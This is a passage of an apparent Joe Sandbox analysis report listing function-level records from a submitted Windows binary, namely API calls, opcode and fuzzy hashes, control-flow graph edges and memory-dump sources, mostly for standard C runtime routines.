            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: CreateErrorLastThread__dosmaperr
            • String ID:
            • API String ID: 2744730728-0
            • Opcode ID: a2eb29c817c913f412fa0a72b567889989e483abd0dc43232f1bd59a2aff0941
            • Instruction ID: 646236686f5e63853953f17f465ab783e7fedd1abe2239a1debcc1e7572632ee
            • Opcode Fuzzy Hash: a2eb29c817c913f412fa0a72b567889989e483abd0dc43232f1bd59a2aff0941
            • Instruction Fuzzy Hash: A1019A72A00209AFEF15AFA5DC06AEE3BA4EF00360F100168F801D2160DB74CA58FBA1

            Control-flow Graph

            APIs
            • GetLastError.KERNEL32(00FC3A10,0000000C), ref: 00F9F693
            • ExitThread.KERNEL32 ref: 00F9F69A
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorExitLastThread
            • String ID:
            • API String ID: 1611280651-0
            • Opcode ID: 5d6162e80cf493b5ccea9f558cd44a4b903374c325448af4c39d9b01b0e0a892
            • Instruction ID: 2cba8e65d0c7ce63b4299c1f3c6db9c33c1142f9f0a9b8335ee4841977e53d3d
            • Opcode Fuzzy Hash: 5d6162e80cf493b5ccea9f558cd44a4b903374c325448af4c39d9b01b0e0a892
            • Instruction Fuzzy Hash: 78F0AFB1900205AFEF00BF70DC4AA6E3B64EF01750F200169F00597262DB78A904FFA1

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 190 fa8c7a-fa8ca2 191 fa8ca8-fa8caa 190->191 192 fa8ca4-fa8ca6 190->192 194 fa8cac-fa8cae 191->194 195 fa8cb0-fa8cb7 call fa8baf 191->195 193 fa8cf9-fa8cfc 192->193 194->193 197 fa8cbc-fa8cc0 195->197 198 fa8cdf-fa8cf6 197->198 199 fa8cc2-fa8cd0 GetProcAddress 197->199 201 fa8cf8 198->201 199->198 200 fa8cd2-fa8cdd call fa60db 199->200 200->201 201->193
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d1dd1868dc30c8a32aebd1915947d37c3dd4374d7a0d530d66a94217fdaafe6c
            • Instruction ID: 5ec8c886886d8f0341279241eefc37fa1d127b407d1b071c451f06153aa39db8
            • Opcode Fuzzy Hash: d1dd1868dc30c8a32aebd1915947d37c3dd4374d7a0d530d66a94217fdaafe6c
            • Instruction Fuzzy Hash: CE0168B3B11226AFAF158E2DEC41A5B3396FBC27B07244120F901DB144DF34DC42ABA0

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 204 fa9b87-fa9b93 205 fa9bc5-fa9bd0 call fa2f1d 204->205 206 fa9b95-fa9b97 204->206 213 fa9bd2-fa9bd4 205->213 208 fa9b99-fa9b9a 206->208 209 fa9bb0-fa9bc1 RtlAllocateHeap 206->209 208->209 210 fa9b9c-fa9ba3 call fa8279 209->210 211 fa9bc3 209->211 210->205 216 fa9ba5-fa9bae call fa82c4 210->216 211->213 216->205 216->209
            APIs
            • RtlAllocateHeap.NTDLL(00000000,00FAFFAD,?,?,00FAFFAD,00000220,?,00000010,?), ref: 00FA9BB9
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 7c8f002b9e5eb13347f136fe414404d5c56a651136292579b251758b8979881e
            • Instruction ID: ea0669cb9f868a07856a5258158cadd7f9121fa905438440a368b1a1fd04a3fe
            • Opcode Fuzzy Hash: 7c8f002b9e5eb13347f136fe414404d5c56a651136292579b251758b8979881e
            • Instruction Fuzzy Hash: BAE0E5B560C2216ADB212635AC04B6B3658AF833F0F044130AC08A20C4DFE4CD00B5F0
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: __floor_pentium4
            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
            • API String ID: 4168288129-2761157908
            • Opcode ID: 7750a126deaa4817b63143362798e1abaf49e095c7c764f09e5f4d641d80d353
            • Instruction ID: 2fdb052dbbec90171f10505251999bcb98ba7fb8324c51f2fcda3ade57b7f963
            • Opcode Fuzzy Hash: 7750a126deaa4817b63143362798e1abaf49e095c7c764f09e5f4d641d80d353
            • Instruction Fuzzy Hash: 99D23B72E082288FDB25CF29CD407EAB7B5EB45315F1441EAD44DE7241EB38AE85AF41
            APIs
            • GetLocaleInfoW.KERNEL32(?,2000000B,00FB2D2D,00000002,00000000,?,?,?,00FB2D2D,?,00000000), ref: 00FB2AA8
            • GetLocaleInfoW.KERNEL32(?,20001004,00FB2D2D,00000002,00000000,?,?,?,00FB2D2D,?,00000000), ref: 00FB2AD1
            • GetACP.KERNEL32(?,?,00FB2D2D,?,00000000), ref: 00FB2AE6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID: ACP$OCP
            • API String ID: 2299586839-711371036
            • Opcode ID: 1c9092241557a4684400c7b28a3ce499a48082a91ff46edb4c185552bacf1163
            • Instruction ID: d39b77e2cf6cb25e6f6c73b12a6bd9bc9a432c1e448c4ec70327f427d3d8b55d
            • Opcode Fuzzy Hash: 1c9092241557a4684400c7b28a3ce499a48082a91ff46edb4c185552bacf1163
            • Instruction Fuzzy Hash: CE217122B00105AADBB49F1ACD01BE772AEEB54B74B668524E90AD7101E736DE41EF50
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00FB2CF0
            • IsValidCodePage.KERNEL32(00000000), ref: 00FB2D39
            • IsValidLocale.KERNEL32(?,00000001), ref: 00FB2D48
            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00FB2D90
            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00FB2DAF
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
            • String ID:
            • API String ID: 415426439-0
            • Opcode ID: e781e83061566bc1c5d3bb3aa67d6b46007cfd9a8c62217f8d5ffc26f4e05a6f
            • Instruction ID: 484a0ed85fecac87798bfcdf76965ce6a224bb28ebedb54c7e553fd4b5e369ba
            • Opcode Fuzzy Hash: e781e83061566bc1c5d3bb3aa67d6b46007cfd9a8c62217f8d5ffc26f4e05a6f
            • Instruction Fuzzy Hash: B25173B1E00209ABDF60DFA6CC81AFE77B8FF08720F144529E911E7150EB749A44AF61
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • GetACP.KERNEL32(?,?,?,?,?,?,00FA730D,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FB2341
            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FA730D,?,?,?,00000055,?,-00000050,?,?), ref: 00FB236C
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FB24CF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLast$CodeInfoLocalePageValid
            • String ID: utf8
            • API String ID: 607553120-905460609
            • Opcode ID: a7707036961309ba5e98b1a1d154c4cdb463e266eb20f54e84e6fdfca0454c50
            • Instruction ID: fa8df33a5cae6973747ffe3161e8894788f0ca30a4e0032e81eae777499df681
            • Opcode Fuzzy Hash: a7707036961309ba5e98b1a1d154c4cdb463e266eb20f54e84e6fdfca0454c50
            • Instruction Fuzzy Hash: 14712671E00206AADB65EB76CC42BFA73A8FF09710F144069F505DB582EB78E941AF51
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: _strrchr
            • String ID:
            • API String ID: 3213747228-0
            • Opcode ID: adabab75f0cd4e4127e2d25f40a6035a1c11768978d09e5fd8cbb18de81cc5b4
            • Instruction ID: bc251a59000977815b54a35a495a1ea30ed25c171fdabf41833c84938e5c4fce
            • Opcode Fuzzy Hash: adabab75f0cd4e4127e2d25f40a6035a1c11768978d09e5fd8cbb18de81cc5b4
            • Instruction Fuzzy Hash: 11B159B2D082459FDB11CF28C8817FEBBA5EF5A350F148169E805EB242D3799D05EBA1
            APIs
            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00FAF89E
            • FindNextFileW.KERNEL32(00000000,?), ref: 00FAF992
            • FindClose.KERNEL32(00000000), ref: 00FAF9D1
            • FindClose.KERNEL32(00000000), ref: 00FAFA04
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: Find$CloseFile$FirstNext
            • String ID:
            • API String ID: 1164774033-0
            • Opcode ID: 2b3e591501dd76e28071b621c3594e194976e4c7fe59dbefd8fa907a6c54e46f
            • Instruction ID: 18615984a08eda29e44afc5cddf2b0fac4ff99e2c7bda5668b05de50724c3cdb
            • Opcode Fuzzy Hash: 2b3e591501dd76e28071b621c3594e194976e4c7fe59dbefd8fa907a6c54e46f
            • Instruction Fuzzy Hash: 2071F6B1D0515D6FDF209F78CC89AFAB7B9AF0A310F1441E9E0489B211DB355E89AF10
            APIs
            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F9B6A6
            • IsDebuggerPresent.KERNEL32 ref: 00F9B772
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F9B78B
            • UnhandledExceptionFilter.KERNEL32(?), ref: 00F9B795
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
            • String ID:
            • API String ID: 254469556-0
            • Opcode ID: 7c96afb0b454ae153973abce54f8a90ca7cad51d264bda6d85523d0872e9a395
            • Instruction ID: b6c21d5ac3b23215f56308345818cef5e96d0f14ac1e2fca20ee584f12cfc5fb
            • Opcode Fuzzy Hash: 7c96afb0b454ae153973abce54f8a90ca7cad51d264bda6d85523d0872e9a395
            • Instruction Fuzzy Hash: E431F775D0521C9BEF21EFA4DD897CDBBB8AF08300F1041EAE50CAB250EB759A859F45
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FB26E7
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FB2731
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FB27F7
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: InfoLocale$ErrorLast
            • String ID:
            • API String ID: 661929714-0
            • Opcode ID: 57294488dfd57fb5c52ca2afb96eaf3fedca7a21a47c168dbf9f4e3d8fdda584
            • Instruction ID: f34ef884b4c0e0a5643f03be87aafc414dd6b33e2cad51ea7135acb7838c1d6b
            • Opcode Fuzzy Hash: 57294488dfd57fb5c52ca2afb96eaf3fedca7a21a47c168dbf9f4e3d8fdda584
            • Instruction Fuzzy Hash: 6B6193719101079FEBA89F2ACC82BFA73A8EF04711F10417AED05C6585EB38D985EF50
            APIs
            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000010), ref: 00FA2D1B
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 00FA2D25
            • UnhandledExceptionFilter.KERNEL32(00FC3748,?,?,?,?,?,00000010), ref: 00FA2D32
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 350d8202316b94f277846cec224d5f66004e526a744c31b78a9f06c31f94faa9
            • Instruction ID: 8c970780bee929cce8fd7ca094d8db1839ef057002df4ca7e2316eab17aa769c
            • Opcode Fuzzy Hash: 350d8202316b94f277846cec224d5f66004e526a744c31b78a9f06c31f94faa9
            • Instruction Fuzzy Hash: FF31D4B490121C9BCB21DF68DD89B8CBBB8BF08310F5042EAE41CA7261E7749B859F45
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fec831842d4b3e083d0d5fc355441d8007b4a970f2afc1f871a5a5b277875a26
            • Instruction ID: 376e81993d3489247be6a591459dcca464534e5bad14658c3132259232cadd2b
            • Opcode Fuzzy Hash: fec831842d4b3e083d0d5fc355441d8007b4a970f2afc1f871a5a5b277875a26
            • Instruction Fuzzy Hash: 5CF14FB1E01619DFDF14CFA9C8806AEB7B1FF89724F158269E819AB380D7349D05DB90
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID: %$+
            • API String ID: 0-2626897407
            • Opcode ID: c2513bafea318f081f74fa082069e9e5abe5692480ebbb4dce029a1d0b95b528
            • Instruction ID: b4ab5eccfcd20a9950be9aaadb4123b91fb43f864a356162298d4fa4840ec154
            • Opcode Fuzzy Hash: c2513bafea318f081f74fa082069e9e5abe5692480ebbb4dce029a1d0b95b528
            • Instruction Fuzzy Hash: 0AF10072908240AFEB15DF28CC41A6FBBE5FFC9750F044A1DF984AB251D734E944AB92
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID: %$+
            • API String ID: 0-2626897407
            • Opcode ID: 858f810ca29e424711fbc519bd23f41f7c37915cb8d6c3d3ad79a5438bce5512
            • Instruction ID: a811bd76ff5cc6c4569fa7bcea5f2925b2e09b904765f286e7e8788fa1f9dd9c
            • Opcode Fuzzy Hash: 858f810ca29e424711fbc519bd23f41f7c37915cb8d6c3d3ad79a5438bce5512
            • Instruction Fuzzy Hash: 9AF110729082019FEB15DF28CC41A6FBBE5EFC9710F054A2DF984A7241D734EA44AB92
            APIs
            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FAB117,?,?,00000008,?,?,00FB7A35,00000000), ref: 00FAB349
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ExceptionRaise
            • String ID:
            • API String ID: 3997070919-0
            • Opcode ID: 85bbaa63f634b3d294490a1cf5f38976b7f1bfc8c098f0fb7ff0df3295f9dd53
            • Instruction ID: ad4cfa313268f6f21f7adea89fe8f8646a22d4213f9cb928a6495feb657fda44
            • Opcode Fuzzy Hash: 85bbaa63f634b3d294490a1cf5f38976b7f1bfc8c098f0fb7ff0df3295f9dd53
            • Instruction Fuzzy Hash: 72B17FB2610604CFDB15CF2CC486B697BE0FF46364F258659E899CF2A2C335E981DB40
            APIs
            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F9B396
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: FeaturePresentProcessor
            • String ID:
            • API String ID: 2325560087-0
            • Opcode ID: 6d0dc3dd07a7b80b9f391c0071faedc47aed0e5055fb935a3a279268950be0ae
            • Instruction ID: 03819a02e5bbb7c50cd13a71fd12130d0609124d0fa745713719aa7b9ab17036
            • Opcode Fuzzy Hash: 6d0dc3dd07a7b80b9f391c0071faedc47aed0e5055fb935a3a279268950be0ae
            • Instruction Fuzzy Hash: 30517271D006058FEB28CF68EA917AAB7F0FB44720F14842AD545EB255D7799D40EF50
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID: 0
            • API String ID: 0-4108050209
            • Opcode ID: d7d1b55b921a6386e5bb2fa22468e00570634f7d2b60a110c6afc899375bcd84
            • Instruction ID: beef73a7c2213817467ac5105a8da3411a7cb3c3bd043d72b9f3901ab69fcaba
            • Opcode Fuzzy Hash: d7d1b55b921a6386e5bb2fa22468e00570634f7d2b60a110c6afc899375bcd84
            • Instruction Fuzzy Hash: 65C1DFB4E006468FDB24CF68C4906BABBB6BF47320F2A4619D492DB391C735EC45EB51
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FB293A
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLast$InfoLocale
            • String ID:
            • API String ID: 3736152602-0
            • Opcode ID: 6e11ad2f755a403f759ad20d08749501f402467c2c2aa68cf7c2e61149249066
            • Instruction ID: 2acaa2ca92e5493e826f491e29f83eac36fd159fb289d2f382336f540443d6d7
            • Opcode Fuzzy Hash: 6e11ad2f755a403f759ad20d08749501f402467c2c2aa68cf7c2e61149249066
            • Instruction Fuzzy Hash: AB219572A10206ABEB689B26DC42FFA73A8EF45324F100079FD09D6141EB78ED45BF51
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
